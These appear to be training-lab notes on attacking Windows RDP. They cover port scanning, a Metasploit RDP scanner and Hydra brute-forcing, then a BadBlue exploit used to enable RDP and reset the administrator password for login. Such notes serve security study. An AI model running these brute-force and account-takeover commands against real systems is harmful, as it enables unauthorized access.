RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, enabling users to remotely access and interact with a Windows system through a graphical user interface (GUI). By default, RDP uses TCP port 3389 but can be configured to run on other ports. Authentication requires valid user credentials, including a username and password in cleartext. Attackers can attempt RDP brute-force attacks to discover valid credentials and gain unauthorized access to a target system.

Enumeration & Exploitation

Enumeration

nmap -sV -p- [IP]

With Metasploit

msfconsole -q
search rdp_scanner
use auxiliary/scanner/rdp/rdp_scanner
show options
set RHOSTS [IP]
set RPORT [PORT]
run

Login Brute-force

hydra -L [wordlist] -P [passlist] rdp://[IP] -s [PORT]

# connect using xfreerdp
xfreerdp /u:username /p:password /v:IP:Port

BadBlue & Enable RDP

msfconsole -q
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit

use post/windows/manage/enable_rdp
set SESSION 1
exploit

sessions -i 1
shell
net user administrator hacker_123321

xfreerdp /u:administrator /p:hacker_123321 /v:demo.ine.local

# answer Y to xfreerdp's certificate trust prompt
Y
